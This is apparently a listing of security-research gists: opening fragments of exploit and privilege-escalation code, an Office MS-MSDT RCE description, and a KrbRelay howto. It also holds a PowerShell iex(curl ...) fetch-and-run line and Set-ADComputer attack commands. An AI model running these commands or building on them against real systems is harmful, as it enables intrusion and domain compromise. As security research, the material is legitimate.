testanull

# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

susMdT

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT

HackingLZ

#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse

from colorama import Fore
from colorama import Style
from colorama import init

antonioCoco

// TcbElevation - Authors: @splinter_code and @decoder_it

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>

#pragma comment(lib, "Secur32.lib")

void EnableTcbPrivilege(BOOL enforceCheck);

X-C3LL

' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)


'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/


Private Type LARGE_INTEGER

rqu1

from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

tothi

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

Wh04m1001

iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )

Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose

#in my testing i had to set dnshostname to $null first

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null

Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local

tothi

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

• LDAP signing not required on Domain Controller (default!)

mbierman

#!/bin/bash
# v 2.1.0
  
syslog=/etc/rsyslog.d/09-externalserver.conf
# this logs notice and above. use *.* log everything. 
filter=*.notice
server=192.168.0.19 # Change the server to the IP of your syslog server.
port=514
hostname=firewalla
valid=$(grep "$server:$port" $syslog 2>/dev/null)